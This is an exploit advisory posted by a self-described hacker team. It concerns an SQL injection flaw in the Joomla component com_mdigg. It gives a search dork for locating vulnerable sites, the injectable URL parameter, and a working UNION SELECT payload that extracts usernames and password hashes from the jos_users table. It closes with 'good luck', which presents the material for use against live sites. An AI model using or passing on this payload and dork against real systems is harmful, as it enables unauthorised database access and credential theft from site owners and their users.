41 lines
No EOL
1.7 KiB
Text
41 lines
No EOL
1.7 KiB
Text
|| || | ||
|
|
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
|
|
( : / (_) / ( .
|
|
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|
|
| _ __ __ __ ______ |
|
|
| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |
|
|
| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |
|
|
| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ |
|
|
| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
|
|
| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ |
|
|
| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ |
|
|
| \ \____/ >> team wlhaan hacker |
|
|
| \/___/ |
|
|
| |
|
|
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|
|
|
|
|
|
_____________________________________________________
|
|
Joomla Component com_mdigg(category) SQL-injection vulnerability
|
|
|
|
#####################################################
|
|
# [+] Author : wlhaan hacker #
|
|
# [+] Email : iit@HoTMaiL.coM #
|
|
# [+] Site : www.sa-hacker.com/vb #
|
|
# [+] team wlhaan Hacker #
|
|
# [+] Dork : "index.php?option=com_mdigg". #
|
|
# [+] ""
|
|
#####################################################
|
|
Example:
|
|
http://server/path/index.php?option=com_mdigg&act=story_lists&task=view&category=[exploit]
|
|
|
|
|
|
Exploit:
|
|
-9999/**/union/**/all/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,11,12,13/**/from/**/jos_users/*
|
|
|
|
|
|
and good luck :D
|
|
|
|
Thanks to : shooq hacker ..
|
|
|
|
##################################################### |